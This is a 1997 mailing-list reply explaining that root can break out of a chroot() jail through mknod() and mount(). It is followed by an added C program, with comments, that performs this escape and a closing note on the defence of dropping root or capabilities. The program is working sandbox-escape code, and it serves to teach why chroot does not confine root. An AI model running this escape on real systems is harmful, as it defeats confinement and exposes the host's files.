At 05:05 PM 11/13/97 -0500, Douglas R. Steinbaum wrote:
>Regarding the comment made by Steve Bellovin (pasted at the end of this
>message):
>
>I was under the impression that running the chroot() command on a UNIX
>box would make it impossible for all subsequently launched programs to
>access files located above the newly defined root point, even if such
>programs are launched with a UID of 0. Thus, the command could be used
>as a simple "wrapper" to prevent a user application program which is not
>completely trusted (for example, a commercial SW package for which source
>code is unavailable) from being misused to access critical system files.
>That is, chroot could be run to define the root point such that critical
>files are inaccessible, and then the untrusted application would
>subsequently be launched. Is this not correct?

That was precisely my point -- that this opinion is not correct. There
are numerous ways for root to break out of a chroot() "jail"; the simplest
is to do mknod() to create new special device files for the real disks, and
mount new file systems on those devices. Many other variants are possible
as well.
Received on Nov 14 1997
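The mknod()+mount() escape Bellovin describes, written out as a C program. This is an added example, not code from the original message or from its author. It assumes a Linux host whose real root filesystem lives on block device major 8, minor 1 (the usual /dev/sda1) and is ext4, and it uses /tmp/jail as the jail directory; all three are assumptions to adjust for your machine. It must run as uid 0: as a normal user it stops at chroot() or mknod() with EPERM, which is exactly the point of the thread.

```c
/* chroot_escape.c - added example of a uid-0 process leaving a chroot()
 * jail by fabricating a device node for the real disk and mounting it.
 * ASSUMED: real root is block device 8:1 (/dev/sda1), ext4; jail is /tmp/jail.
 * Build: cc -o chroot_escape chroot_escape.c   Run as root: ./chroot_escape
 */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if both paths name the same inode on the same device, else 0
 * (including when either path cannot be stat()ed). Used afterwards to show
 * that what we mounted is not the jail's own filesystem. */
int same_file(const char *a, const char *b) {
    struct stat sa, sb;
    if (stat(a, &sa) != 0 || stat(b, &sb) != 0) return 0;
    return sa.st_dev == sb.st_dev && sa.st_ino == sb.st_ino;
}

/* Runs inside an already-entered jail, so every path here is relative to
 * the jail's "/". Returns 0 on success, -errno at the first failing step. */
int escape_via_mknod(unsigned dev_major, unsigned dev_minor, const char *fstype) {
    /* 1. The jail ships no device nodes, but root keeps the right to create
     *    them (CAP_MKNOD on Linux): conjure one for the real disk. */
    if (mknod("/realdisk", S_IFBLK | 0600, makedev(dev_major, dev_minor)) != 0
        && errno != EEXIST)
        return -errno;
    /* 2. Root can also mount (CAP_SYS_ADMIN), and mount() does not care
     *    that the target lives inside a chroot. Read-only to avoid damage. */
    if (mkdir("/realroot", 0700) != 0 && errno != EEXIST) return -errno;
    if (mount("/realdisk", "/realroot", fstype, MS_RDONLY, NULL) != 0)
        return -errno;
    /* 3. The host's entire filesystem is now reachable below /realroot. */
    return 0;
}

int main(int argc, char **argv) {
    const char *jail = argc > 1 ? argv[1] : "/tmp/jail";   /* assumed jail dir */
    if (mkdir(jail, 0755) != 0 && errno != EEXIST) { perror("mkdir jail"); return 1; }
    if (chroot(jail) != 0 || chdir("/") != 0) {        /* chdir("/") is required:
                                                           chroot() alone leaves the
                                                           cwd outside the new root */
        perror("chroot (needs uid 0)");
        return 1;
    }
    /* From here "/" is the empty jail: no /etc/passwd, no /dev. */
    printf("inside jail: /etc/passwd is %s\n",
           access("/etc/passwd", R_OK) == 0 ? "visible" : "absent");

    int rc = escape_via_mknod(8, 1, "ext4");          /* ASSUMED device and fstype */
    if (rc != 0) { fprintf(stderr, "escape failed: %s\n", strerror(-rc)); return 1; }

    printf("after mknod+mount: /realroot/etc/passwd is %s\n",
           access("/realroot/etc/passwd", R_OK) == 0 ? "readable" : "missing");
    printf("/realroot is %s the jail filesystem\n",
           same_file("/", "/realroot") ? "the same as" : "different from");
    return 0;
}
```

The program never calls chroot() a second time or touches the original root path; it simply reaches the same disk by a second route, which is why hiding files under a different root point does nothing against a uid-0 caller. The defence that actually works is the one the reply implies: do not give the jailed program root in the first place, or (on modern Linux) strip CAP_MKNOD and CAP_SYS_ADMIN before exec so that step 1 or step 2 above fails with EPERM.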